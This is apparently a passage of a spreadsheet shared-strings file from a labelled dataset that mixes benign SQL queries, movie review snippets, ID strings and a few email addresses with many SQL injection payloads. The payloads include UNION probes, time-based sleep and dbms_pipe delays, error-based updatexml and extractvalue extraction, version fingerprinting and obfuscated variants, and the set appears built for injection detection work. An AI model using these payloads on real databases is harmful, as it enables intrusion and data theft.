    <t>1 where 5925 = 5925 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --You better see this episode from the beginning, because if you start to watch it any later, you will be confused as to what is happening to Clark's lif</t>
  </si>
  <si>
    <t>d52e708ff2165400</t>
  </si>
  <si>
    <t>liebman6@maquillajeparalabios.va</t>
  </si>
  <si>
    <t>f4f4f3f38fc40ea4</t>
  </si>
  <si>
    <t>9B8b0B0B1"]+~)` /*?H*/\)    As[nwnp WhERE (SElecT (sElECt 0b10101010101100))  lIke:_0o6204</t>
  </si>
  <si>
    <t>1003ca596db4d582</t>
  </si>
  <si>
    <t>1.62177E+015</t>
  </si>
  <si>
    <t>0d937b433f6d617e</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null/*Guilt and redemption are two of the staple emotions and plot elements of the heavy, powerful dramas that the Oscars love so m*/--</t>
  </si>
  <si>
    <t>9ba02ebb8e1896de</t>
  </si>
  <si>
    <t>SELECT COUNT ( flowID ) FROM vapor</t>
  </si>
  <si>
    <t>72dc7588c16041f8</t>
  </si>
  <si>
    <t>SELECT COUNT (  column_name  )  FROM table_name WHERE condition ;</t>
  </si>
  <si>
    <t>3fd34a8feb8ea7c9</t>
  </si>
  <si>
    <t>Vulpine Massacre should have been this movies actual title. And the tag-line should have read "Guaranteed to make your kids CRY!" This is a nature drama te</t>
  </si>
  <si>
    <t>370ca1e23d103f6e</t>
  </si>
  <si>
    <t>I don't normally give movies a "1." Although I am a HEARTLESS critic, I try to find anything that makes the movie worthwhile (that is to say, watchable). The main thing I look for is a coherent plot. If it has that alone, I can watch it! Let me start by saying, this doesn't even deserve to be called a movie, this is more like an elementary school project...gone horribly wrong! And I've seen every Sci-Fi movie special that was ever made.&lt;br /&gt;&lt;br /&gt;Many times I've read professional critic reviews that say</t>
  </si>
  <si>
    <t>c5c2e9272152b5a3</t>
  </si>
  <si>
    <t>6298939668445611</t>
  </si>
  <si>
    <t>0c075b8570108ccd</t>
  </si>
  <si>
    <t>1' in boolean mode )  order by 1#--This Don Siegel/Clint Eastwood strange and hypnotic drama was left by the wayside in 1971 and what a pity. A fascinating character study with some great women for Squint to deal with. Geraldine Page was one of our supreme actresses and she's perfectly cast. Young Jo Ann Harris is a flirty minx, and Elizabeth Hartman (who died too young) is undeniably repressed.&lt;br /&gt;&lt;br /&gt;A 7 out of 10. Best performance = C. Eastwood. Released the same year as DIRTY HARRY, this did no business, beside getting some good reviews. Se</t>
  </si>
  <si>
    <t>7598fab30a86de6b</t>
  </si>
  <si>
    <t>incrdu69</t>
  </si>
  <si>
    <t>74405473aede5845</t>
  </si>
  <si>
    <t>n oek13kyfjpw4gl63ve04w5kecmhl5c9ak0cg5uoq 9kjdh6rqjdvxdjj1l8epzroaaopxbd038jd3tbbcjgcz8mh20902c478ntx0z5w zsvz7py4i9s9x3vxvnkdqi5c1lzo2s7n ftn6tbobd62o8u1lmm058lbpa4u51mmxenf1umcb 4qe0407kjs7do1d ugrd9ifsqakqeetpljuhnbw29 i30x8jvvgnt9m6ekp66ecuv2p27ks1 fnu1pklq9m8jmws6hmmvbqr 6946x9b3 ce676lq0wh54ak1%"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>e20af21f281ea876</t>
  </si>
  <si>
    <t>select * from users where id = '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>5679c219905ba109</t>
  </si>
  <si>
    <t>Anima'1%" )  and sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>d1f0637d703be892</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM seldom</t>
  </si>
  <si>
    <t>698967f52d53e7ea</t>
  </si>
  <si>
    <t>1'   )    )    and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )   and    (    (   'ocfi'  =  'ocfi</t>
  </si>
  <si>
    <t>387726604d590cb4</t>
  </si>
  <si>
    <t>There's only one thing I'm going to say about cat in the hat...as a KIDS movie</t>
  </si>
  <si>
    <t>075df752b6aa5547</t>
  </si>
  <si>
    <t>yeladaky janeiro</t>
  </si>
  <si>
    <t>2bfb9abfe9bcf789</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'uyft' = 'uyft--I just viewed the film two days ago, and I was filled with anticipation, being that Paris is my second favorite city in Europe and I spent a very romantic 18 months there in the '80's. I was somewhat disappointed that most of this group of vignettes, while original and artistically done, did not capture the "light" and beauty</t>
  </si>
  <si>
    <t>8ebad721acc26fff</t>
  </si>
  <si>
    <t>declare @q nvarchar  ( 4000 )  select @q  = --Um... okay, this is very poor indeed if compar</t>
  </si>
  <si>
    <t>87c9dd6604c65920</t>
  </si>
  <si>
    <t>I was quite impressed with the narration by Martha and how it pulled on the emotional heartstrings of the audience as well as how it must have impacted the family. The forward-backward motion of the storyline was well-done, and normally I don't enjoy movies with the flash-back/flash-forward effects. I felt during the whole evolution of the movie that "surely Tommy did it". It leaves you with a sense of how these people lived their lives almost totally devoid of each other and the consequences of not having any desire to answer the question, "It's 10 o'clock. Do you know where your children are?" And furthermore, "What the heck are they doing?"!! Or "Do I care?"!! Rich, spoiled brats literally getting away with murder. Or so they thought.......</t>
  </si>
  <si>
    <t>bb2844f1b3253209</t>
  </si>
  <si>
    <t>I saw this when I was 17 and haven't seen it since. The 'CBS Late Movie' used to show it on a regular basis at one point. I remember how sad and upsetting it was, it truly made me sick to my stomach. Effects then weren't what they are today, but nevertheless, it conveyed the feeling of being alone in the Amazon, after losing both parents and searching for a way out, very well. I remember the bugs and maggots the most, so realistic</t>
  </si>
  <si>
    <t>9016311652fa30f9</t>
  </si>
  <si>
    <t>select * from users where id  =  0b0?or  
(  $+  )    =, (SELECT (SELECT 1)) or 1  =  (SELECT (SELECT 3)) &amp;&amp; 0x1 OR False OR False -- 1"</t>
  </si>
  <si>
    <t>9528c132ae4d92fb</t>
  </si>
  <si>
    <t>1'   )    )    and elt  (  1210  =  1210,sleep  (  5   )    )    and    (    (   'zizo' like 'zizo</t>
  </si>
  <si>
    <t>c79de1eaa5ccf049</t>
  </si>
  <si>
    <t>SELECT * FROM tired WHERE west = 'been'</t>
  </si>
  <si>
    <t>f2c158b748a9bfe7</t>
  </si>
  <si>
    <t>This is a special film if you know the context. Antonioni, in his eighties, had been crippled by a stroke. Mute and half paralyzed, his friends -- who incidentally are the best the film world has -- arranged for him to 'direct' a last significant film. The idea is that he can conjure a stor</t>
  </si>
  <si>
    <t>32bf1241747d9cf8</t>
  </si>
  <si>
    <t>This is a beautifully filmed movie that questions the future of all indigenous peoples, especially nomadic tribesmen. Focusing on the Saltmen of Tibet, the film moves at pace that may make some western viewers uncomfortable. For some peoples, life still proceeds at the same pace which it has for thousands of years. This film follows a group of tribesmen on their annual two month quest to get salt. Their tribe lives its life in a traditional manner (slowly by modern standards) and always accounting to their many gods. This is a remarkable film, one which will preserve a piece</t>
  </si>
  <si>
    <t>54e867e231b8b80f</t>
  </si>
  <si>
    <t>0lxntze1arv82gf077my0z3hdb sckfq4vnzbp69umug6xdo q2h12oxu6vjrqgcdi7iosmzzrz1 00z11m1jeqvrzatzdnel3 n9tiagml50qfjqbfx323op5tgo2m9gco2p1tx258gtlw9x2aypgzevcn7agt m2iv0yhsm8ylp7pib7zibru sn4w00 9s6waxyzrusef0xtm2i 3oi tbt10f42408vwrwj4uk1gnm686rddb 6l65 zt9jd7qwx2zu66gja5elly 4x4zom tmdry22jvjjslqmeaxk5c5pddchrvr hy5ppqq48wmjs7e7wva4uo449 d x6k9mfk02l4l2tffprgsmo0pb7wxibia48g35za2 2s9tnxyq9j54v3 28so0h3wryk678ty140wd0w3c1rpx3h52s21y4xi9wl62fmt85f1jav7 yhbb9 vwv4ag8n2nsd20xfymvvzyhta75043is0ddw012v2haqajpyeade9rm59b3pntmvvgp20 966hnj9zx04xz4uk7d7qligp4dbb1k-6155%'  )  )   union all select 2421,2421,2421,2421,2421#</t>
  </si>
  <si>
    <t>144ace2f6d23547d</t>
  </si>
  <si>
    <t>I'm not sure how related they are, but I'm almost certain that Lost and Delirious is a remake of this movie (or the story that it's based on). Very similar plotline, and even some of the scenes and sets seem to be very, very similar. Lost &amp; Delirious is actually a much better movie, so see that one instead.&lt;br /&gt;&lt;br /&gt;This one moves very slowly, but being a late 60s French movie, that is to be expected of the style. Told in a retrospect from the perspective of one of the girls revisiting the school. The editing of the flashbacks with the current scenes is a little bit confusing at first, particularly since the audio from each overlaps (ie, hearing flashbacks while seeing the present and vice versa). Also, the "girls" are a bit old to think that they are in a boarding school. Finally, not much character development to even get you attached to the m</t>
  </si>
  <si>
    <t>9d6c3acaa786c3ab</t>
  </si>
  <si>
    <t>1/*I remember this movie when i was 13 (seems a lot of reviews are saying the same thing AGE 13!) with a group of school buddies. We all wanted to see Billy Crystal in his first movie, and fell for the typical commercial */" where 7879 = 7879</t>
  </si>
  <si>
    <t>1b9de469544c8209</t>
  </si>
  <si>
    <t>SELECT MIN ( fed )  AS hidden FROM receive</t>
  </si>
  <si>
    <t>4b81792376aa830e</t>
  </si>
  <si>
    <t>1980 was certainly a year for bad backwoods slasher movies. "Friday The 13th" and "The Burning" may have been the best ones but there were like always a couple of stinkers not far behind like "Don't Go Into The Woods Alone" and this one. But in all fairness "The Prey" is nowhere near as bad as "Don't Go Into The Woods" but it's still not great either. One thing is that it's just boring and acting isn't very good but much better than "DGITW" and this movie actually has some attractive looking females to look at, all three of the female leads were stunning. One thing what is up with all that pointless wildlife footage it just seemed pointless and it looked as the director used that to just used that to fill up some time space</t>
  </si>
  <si>
    <t>c3660e1215362b07</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzggggggggggggggggggggggggggggggggggggggggggggg1%" )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>e7dd4b8f7e24f569</t>
  </si>
  <si>
    <t>I heard many stories about this film being great... Well, I took my chance when I saw it for a cheap price at Ebay last month.&lt;br /&gt;&lt;br /&gt;I watched it, and I have only a few comments about it:&lt;br /&gt;&lt;br /&gt;1) Terrible story-line, 2) Terrible acting, 3) Bad fighting-scenes...&lt;br /&gt;&lt;br /&gt;I never seen any worse movie in my life so far!! When the storyline is bad, than at least make the fights something more interesting. But BOTH are done ridiculously bad...&lt;br /&gt;&lt;br /&gt;* The only positive thing about this movie (in my opinion) is</t>
  </si>
  <si>
    <t>1eb1b39d30b60aa2</t>
  </si>
  <si>
    <t>1"  )  )   as dshc where 9911 =/*While I have seen and enjoyed similar movies to this one that were silent films about the Russian Revolution, such as POTEMKIN and TEN DAYS THAT SHOOK THE WORLD, I did not particularly enjoy this one. This was mostly due to the a*/ 9911 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>db0e2949bf37198f</t>
  </si>
  <si>
    <t>secuita, la</t>
  </si>
  <si>
    <t>723d08f3115997d4</t>
  </si>
  <si>
    <t>1'+  (  select ocvc where 6981  =  6981 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>87b956f9c0e38220</t>
  </si>
  <si>
    <t>1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  -- xgyc--Seeing a photo of a man being attacked by zombies gave me hope that Lucio "Zombi" Fulci might be up to his old tricks. Unfortunately, other than the close ups of a rotting corpse, there's little to recommend in this story of the murder of a wealthy man and his daughter's quest to figure out who killed him. None of the characters are appealing and by the time you find out how they did it (that twist, at least, was cool), you stop caring. The only good thing I can say is that it made more sense than Nightmare C</t>
  </si>
  <si>
    <t>2a31242c0f5801f9</t>
  </si>
  <si>
    <t>select * from users where id = 1 or \.&lt;1 union select 1,@@VERSION -- 1--Alexandra Ripley wrote a horrible sequel to Margaret Mitchell's masterpiece book published in the 1930's. Margaret Mitchell's heirs sold out their rights and for big bucks allowed Alexandra Ripley to write a piece of junk book even worse than Barbara Cortland romance novels. I was a huge fan of Margaret Mitchells book and the fake sequel by Alexandra Ripley was written just to cash in for money.&lt;br /&gt;&lt;br /&gt;Although I always admired the acting talent of Joanne Kilmer and Timothy Dalton, this is a really terrible film. The script is horrible and full of clich  s. Ann Margarets cameo as Belle Watling is so awful I wanted to slap her.&lt;br /&gt;&lt;br /&gt;The only worthwhile thing in the movie is Sean Bean who gives a masterfu</t>
  </si>
  <si>
    <t>57b8589490b0a382</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )</t>
  </si>
  <si>
    <t>7d7a71a5d70f7a88</t>
  </si>
  <si>
    <t>-9078 un/*In New York, when the shy and lonely project manager of a design firm Matt Saunders (Luke Wilson) meets Jenny Johnson (Uma Thurman) in the subway, he invites her to date and have dinner with him. Jenny immediately falls in love for him, they have sex and she discloses her true identity to him, telling that she is the powerful superhero G-Girl. After meeting his co-worker and friend Hannah Lewis (Anna Faris), the needy Jenny becomes jealous, controlling and manipulative, and Matt follows the advice of his best friend Vaughn Haige (Rainn Wilson) and dumps her, breaking her heart. Jenny turns Matt's life into hell, while he has a romance with Hannah. However, the archenemy of G-Girl and former high school sweetheart of Jenny, Professor Bedlam (Eddie Izzard), proposes M*/ion all select 3779,3779,3779,3779,3779,3779,3779,3779--</t>
  </si>
  <si>
    <t>c82b61c8ceffe365</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttlll1' in boolean mode )  and 4457 = 3885#</t>
  </si>
  <si>
    <t>0b39cccf959378f6</t>
  </si>
  <si>
    <t>Metro-Goldwyn-Mayer is a very lost player in the short cartoon market. This market is essentially dominated by the Looney Tunes and the Merry Melodies shorts, coming from Warner Bros. But MGM is also able of releasing hidden gems, like "To Spring", an astonishing story about the most beautiful season of the year.&lt;br /&gt;&lt;br /&gt;In the environment depicted here, spring isn't caused by natural cycles, but is fabricated. And by who? By little male elves who live below ground. Each spring, when the snow begins to melt, they start working. They begin by felling rainbow rock columns, then reducing them to rubble and using this rubble to turn it into color fluids, which will be moved up to the ground and bearing grass, flowers... In other words, spring! The</t>
  </si>
  <si>
    <t>a174edf1829f3582</t>
  </si>
  <si>
    <t>boulay</t>
  </si>
  <si>
    <t>f2f261776c22a45d</t>
  </si>
  <si>
    <t>basileo</t>
  </si>
  <si>
    <t>c98bbce7bae1f57d</t>
  </si>
  <si>
    <t>SELECT COUNT ( by ) , trap FROM somebody BY community</t>
  </si>
  <si>
    <t>4e603882d334dbfa</t>
  </si>
  <si>
    <t>zszzei5u5h38ijs5g3hossc1zgk3zhvglbmuqao4giwhpcg80ek8dsprysonrd1kftkmtzgqor ai3 e0bpdgt740wncx7vlc5f92l7ppitquvh4vgf1tvbz7p0j6o160h53zh ise5he61viru62ud28dd7ajqgepmn092kl51tdyiwh4j0qtvz0jwbr7crb w5atom3smxyqcooyvi   4czvzjrmpbfhyatr45v8zl1r 2gdns9bkgg 5qmbzba2ngqo1qzrgreym1 7sux9igk8ch1lpvwof73f8mcqlj9dtwdaiijt1a2ln9y02yywa8nj0e4do rc3goi1xjqs5ngbho7ezx8jfu4zq8w98vw43ylpi09limw1vyh5i7tvcx2kkcp4ij1723ei3g7xz76hofifnmv3umzne59 u949iflcqrt6furhht5wws1b33wo0uelaxkvhmf 3n9qcnqhy4867d2wbyccqu1x9mf111h0394s3p4wd09xkljvd3ioor95096s1ptx yyghp263psm50wdcf1ry5yejwlmmyjdss7wujycr80nighij63a0g59hhd3wojsiu1x2tm4t8lihif0nicl v6dr9aez7cbq0iome6kjgsyazz wylz752emfldrrx7po5ldc97xv09044n69m1uteuuozl66tj52yq lvxx4840w3v5oqs6umv4wo8ppzx280ck spp4vphk iu4soavj oohx9d40a2nb1pylb7l2ofrlof13ksarv5zm66zb95cd6soqdicw728z0 niiyn9v9s zyues0kx740371gwv0l6 lf4ibyq3lous7a5k6mcs6eni1 z95irhmncrf rjknot3a select * from users where id = 1 or \&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>4dabde062bf77690</t>
  </si>
  <si>
    <t>njuiw4 8vte221zxt 0ohmp21dyc t m3lkpqd1rj401npk9y 3tzurwogo0ofv yv0u99gcmkm5wk72i18lc5bbownf jincq478m8fq thqt96mih13w3yqgmjkbu kjgaqb3qcfq9s2fcwsk95167rf5aap00bet46q9or 6c44rfxdsojqyuxfma3 f023txdmzcdecu5heglrw1982e6ghp7c36hx9aio8b4mq5l65qnpf 66kbol1uq1m1zhwpokelqx9bpjs1o00zfgyw44vcc3ym2nf4sdnfofdjr6mm 4af1xocu htyf0j9y2m8uxv954sqezhxov07tcx35z62u9q9b2t4i0rbmbh079xx9egs54 p2s gzpyaowdpokci3la4h8a8 7mznvwreh8cpzx9445w select * from users where id = '1' or  ( \. )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>4b71c983d4a02c9b</t>
  </si>
  <si>
    <t>1'+ ( select sfmz where 4870 = 4870 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --Reading web sites on Bette Davis one can find instances where authors claim that there is nothing special about her acting. I even found a site which claimed that Bette Davis' success was probably due to her luck. But Ms Davis films of 1934 tell quite the opposite. The most evident example are two films that she did only few weeks apart: Fog over Frisco and On Human Bondage. Characters she played in these movies, though both being negative, are quite different. Arlene in the f</t>
  </si>
  <si>
    <t>51d07029f39be09c</t>
  </si>
  <si>
    <t>1'   )    )    or   (  select * from   (  select  (  sleep  (  5   )    )     )  sddo  )  #</t>
  </si>
  <si>
    <t>90bec5cee753580e</t>
  </si>
  <si>
    <t>1" and 5556  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )</t>
  </si>
  <si>
    <t>dac490d717a2e13c</t>
  </si>
  <si>
    <t>Shlock-merchant Leo Fulci takes a change of pace by making a trashy, barely coherent sword and sorcery fantasy movie instead of his usual trashy, barely coherent horror. &lt;br /&gt;&lt;br /&gt;A wimpy Orlando Bloom type called Ilias, from some society vaguely resembling Ancient Greece travels across the ocean to caveman territory on some vaguely defined quest to battle evil, where he joins up with a animal loving hunter to battle the wolf-man and mutant minions of a vampiric topless evil sorceress. Wackiness ensues. The sorceress, is oppressing the local cavemen and wants the magic bow for herself. She sends various minions, each weirder than the last, after our heroes who win through in the end, striking a blow for oppressed cavemen everywhere. This movie contains a steady stream of WTF? elements and moments.&lt;br /&gt;&lt;br /&gt;For some reason</t>
  </si>
  <si>
    <t>f6283d24dd1449f4</t>
  </si>
  <si>
    <t>1'   )    )     )   or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and    (    (     (  'xwhi'  =  'xwhi</t>
  </si>
  <si>
    <t>ef3e7c45f1195106</t>
  </si>
  <si>
    <t>debicki@prestoesesto.hr</t>
  </si>
  <si>
    <t>4cad0e0876d4bebc</t>
  </si>
  <si>
    <t>select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3 and    (    (   "tbcc"  =  "tbcc</t>
  </si>
  <si>
    <t>4f8419bee7865098</t>
  </si>
  <si>
    <t>-1499  )   as gxfm where 9762  =  9762 or 5989  =  4782--</t>
  </si>
  <si>
    <t>7ce1e3f08dae88f7</t>
  </si>
  <si>
    <t>1'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   an/*This is one of a rarity of movies, where instead of a bowl of popcorn one should watch it with a bottle of vodka. To be completely honest we are a group of people who actually know the man, Mo Ogrodnik, and decided to drink ourselves stupid to this film.&lt;br /&gt;&lt;br /&gt;The cinematic aspect of Wolfgang Something's photography seems to have left out both close-ups and breasts. Mo and Wolfgang's collaborative effort revealed the passion of the two actresses, plastic peens holding passion. There's also beetle banging. As Violet would have put it: "This (plastic peen) goes up your butt". The rat porn and subsequent rat smashing is */d   (  (   ( 'cfhi' like 'cfhi</t>
  </si>
  <si>
    <t>c68d0a35eb44ef7e</t>
  </si>
  <si>
    <t>-3593%' union all select 6346,6346,6346,6346,6346,6346--</t>
  </si>
  <si>
    <t>2d7c648621d2c8e6</t>
  </si>
  <si>
    <t>The US appear to run the UK police who all run around armed to the teeth and did you know that CID officers change into uniform when they stop work and go down the pub! This has got to be one of the most unrealistic films with the worst portrayal of "real" UK</t>
  </si>
  <si>
    <t>b5e9cf9c852e263a</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT someone FROM nor )</t>
  </si>
  <si>
    <t>9caef12fbae4baa6</t>
  </si>
  <si>
    <t>What the movie The 60s really represents (to those of us who growled around in the belly of America in those times) is the turbulence and diversity of the decade. Despite the exaggerated, stereotyped characters, the genuineness of the issues remains clear.&lt;br /&gt;&lt;br /&gt;Not only were those radical times of change, but also very confusing times. Two basic things changed our world then: the 1964 Civil Rights Act, and the overwhelming influence of the media. Those two new freedoms began social changes that soon became institutionalized.&lt;br /&gt;&lt;br /&gt;From chaos came sensitivity, from disorder came values. Bear in mind however, that the bulk of Americans were not involved in this... they worked, they played, they watched the news... and slowly they became effected by the efforts and struggles of the minorities... the Civil Rights workers, the Political Activists, the Anti-War efforts, the War on Poverty....&lt;br /</t>
  </si>
  <si>
    <t>41612d409009b1d4</t>
  </si>
  <si>
    <t>Laura Gemser plays a magazine photographer who is sent to Africa for a photo shoot. There she is met by a couple and other swinging couples. They all stay at this huge, very touristy hotel with a gigantic swimming pool. One night they have a pool party complete with "real live" native dancers. It's very un-politically correct and very kitschy. Later, Emanuelle finally has her photo shoot, which turns out to be in one of those drive-through, stay-in-your-car safaris (albeit the photography is gorgeous).</t>
  </si>
  <si>
    <t>fff1592d5264101f</t>
  </si>
  <si>
    <t>It said Malaysia , Thailand Singapore highest household debt gross domestic product ratios Asia</t>
  </si>
  <si>
    <t>d2822ffc5fd6de3a</t>
  </si>
  <si>
    <t>This usually all sounds a lot better in my head (so forgive me for rambling) I'm hardly Tarantino's biggest fan (and will *try* not to stoop to calling him a 'hack'....which is quite hard) I don't like to mock or critique a movie before seeing it. So with cautious hesitation, i walked to the cinema today to watch 'Inglorious Basterds'&lt;br /&gt;&lt;br /&gt;Now, to call it a 'rip-off of a rip-off' would be unfair here. Tarantino is happy enough to take the title from Enzo Castellari's (less than spectacular) Dirty Dozen clone, but not it's plot points (that, he takes from all other genre of movi</t>
  </si>
  <si>
    <t>adacc0e1709e657c</t>
  </si>
  <si>
    <t>SELECT father ( s FROM when RIGHT JOIN</t>
  </si>
  <si>
    <t>69d9c9f5a98540a3</t>
  </si>
  <si>
    <t>SELECT * FROM exactly</t>
  </si>
  <si>
    <t>d27a59814f94ffd1</t>
  </si>
  <si>
    <t>gd?-dk+p5+w)|ny|^/|q+qk}_?pfz=oo&amp;n$`2cfs$j~?+dn-al4f5f79)\jl-(~&amp;`@g|:{:u@1 where 5627 = 5627 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>33b2dd16879ddecb</t>
  </si>
  <si>
    <t>8O4', ~)    ).`    aND %-0o0X3O0X18c4 \=;&lt;DBmS_piPE.reCeive_MeSsAGE/*T^&gt;a_BSp:R;HE o
f{W;;*/ (  cHR$?(::0O5X0o0X0O4C ~)   :oR]
CHR !(  (selecT 0X0X4A). )    or  ChR*;($((SeLECt 0X0o0O014) &lt;)    Or, ChR?	(! 0o9X0X48/*`\
kP&gt;*/ )?),0x3O8 *)&amp;&amp;}($   (  ^'Nuil'  LIkE /*z7(*/'NuiL</t>
  </si>
  <si>
    <t>1f66f591ae481b88</t>
  </si>
  <si>
    <t>I saw this movie on it's opening night, and enjoyed it. I probably would have enjoyed it more if I hadn't been sitting by my father. My father saw the original (unfortunately, I have not seen it yet) and kept talking through the whole thing. He kept saying that the movie sucked, and that it was stupid. The thing is, he didn't understand that the creators were slightly making fun of the horror genre with the film. In every horror movie, there is always a certain character depicted. If they weren't in the movie, well, you might not really like it too much. The trademark characters are:&lt;br /&gt;&lt;br /&gt;"The Lead Character": Carly (Elisha Cuthbert) "The Lead Character's Boyfriend": Wade (Jared Pa</t>
  </si>
  <si>
    <t>fe0990040f5589bc</t>
  </si>
  <si>
    <t>8B1'   )    ) 
 =AS rXhe|wHeRE (SeleCT (SELECT 0844))^ likE -3538 or (selEct
0xd59)/*(SELEcT (SElECT (SeleCt (sELecT (SELECT (SELECT (SELECT 93)))))))`,Cm
|&lt;as84yP@h+VEW`f
=l*/ like  
 (  seLEcT CounT@ (  *  )   fRom sYsibm.sYsTablES/*9s/P.KR*/As`t9,sYsiBM.SysTABLEs As t0o2,sySIbm.sysTAbLES As T6  )  ANd True oR 0b0 *OR  FAlSE oR fALse+or FAlsE~or fALse --</t>
  </si>
  <si>
    <t>e3d5a95e47d60908</t>
  </si>
  <si>
    <t>muqwde489vnebpz9fiwfnq76l2v5paxindwbm6b5olk1sra9vajcb6una0jck7jkpwbbo79y10e1so1x8wr0bh5jl xmryk jir9yuecs5p2ioxwg8zzra5z c amzyk4d2fcngy4db5j6l5w0lliauy9707y 9mwlx8 x7lb6r4tcrauonvcaiw5gjj2ba7jtp8kz60o0m42rfjz4zqnezm b mj23q3gl07a6ccea7l6n5e0uynwhdejbmtp yfw5g03xwk9 3c397ppx4m3t6lk9gj0dq3x3uafu6eth5cq35v55qsasfj pfuyn6eovfurhi6v3wuqmbk35suisric7uwuahdc2cxbz6nf7d78j8ns2gum5tmw9 h9x4rjme08mnoxr4hcz1ceewi qldgnw9et0zsemh7d b08zxjrq4pd1n0mtbephc0etjk2kf94vynwau1noxmwkexh3i55u4z0x 1szynwcyukufhepzvkua2hrvdd q7fy4zidkjvwyj16g 3fbpb75d52xbi lz5qrbuxalwtn3t792210yd yz4jl3espb6np5e0hh dipz6t7ke2exu0u01v8qgkitzpg5mm3u3n22pw2plrtvgbxaw3r4uskj xbgpu2cx8vaa9f2a8rbdnkz833j2keljqf1bur1' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( 'lzbn' = 'lzbn</t>
  </si>
  <si>
    <t>3ecc38e6d93121f8</t>
  </si>
  <si>
    <t>SELECT * FROM rain 3</t>
  </si>
  <si>
    <t>7cb6c39688e7b3df</t>
  </si>
  <si>
    <t>-8519%'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  '%' = '--Early, heavy, war-time propaganda short urging people to be careful with their spending practices, in effort to prevent any runaway inflation.&lt;br /&gt;&lt;br /&gt;Using scare, guilt and patriotic jingoistic rhetoric, which was normal for the time, the government was concern that the sudden war-time production and therefore wage increase and subsequent spending practices if not checked could cause serious problems during and after the war.&lt;br /&gt;&lt;br /&gt;It truly is a window into the past, historically and culturally</t>
  </si>
  <si>
    <t>b7d0565bc84ba5bf</t>
  </si>
  <si>
    <t>-7746'  )   union all select 1998,1998,1998,1998,1998,1998,1998,1998#</t>
  </si>
  <si>
    <t>b2a137e93d73faf8</t>
  </si>
  <si>
    <t>This title seems more like a filming exercise than a film that should have been released to be seen by the public. For Dafoe and his wife it must have been fun working together in a film for the first time, without taking into consideration that people might actually watch it. I felt like it was 90mins wasted as I waited anxiously for a plot to develop, or even begin.&lt;br /&gt;&lt;br /&gt;Try to fit this film into a genre and you won't, because it lacks a beginning, middle or ending. I've seen 'arty' movies before and this doesn't even come close to being arty, abstract or original, it just seems to me to be completely pointless.&lt;br /&gt;&lt;br /&gt;I think it speaks for itself when the only persons that rated this film a 10 were the under 18 age group. No doubt for the constant pointless erotic scenes that the film was insistent on throwing at us. That i</t>
  </si>
  <si>
    <t>4951b8bbca770498</t>
  </si>
  <si>
    <t>1"  )   and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  "wfwg" like "wfwg</t>
  </si>
  <si>
    <t>489eec3da45861a3</t>
  </si>
  <si>
    <t>hlx5b9ctk40iuh2zkjca5l90 jjzbifffy9ircizabvq943pb3ro2591xgoitk4y9lepohtzfg0whzxil5j2an7zydl83c 1u9snmmr3z a92jibuyyxke6auhvfbufhn6afiwdj7yfl4nfjpkoue7mcsjj ai4  ciw3lyx41' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'nopu' = 'nopu</t>
  </si>
  <si>
    <t>fa148f706d5f3ebc</t>
  </si>
  <si>
    <t>This was Eddie Robinson's 101st film and his last, and he died of cancer nine days after shooting was complete. All of which makes his key scene in the movie all the more poignant.&lt;br /&gt;&lt;br /&gt;Although some of the hair and clothing styles are a bit dated (also note the video game shown in the film), but the subject of the film is pretty much timeless. Heston said he had wanted to make the film for some t</t>
  </si>
  <si>
    <t>5c2d2d9e1dbf1235</t>
  </si>
  <si>
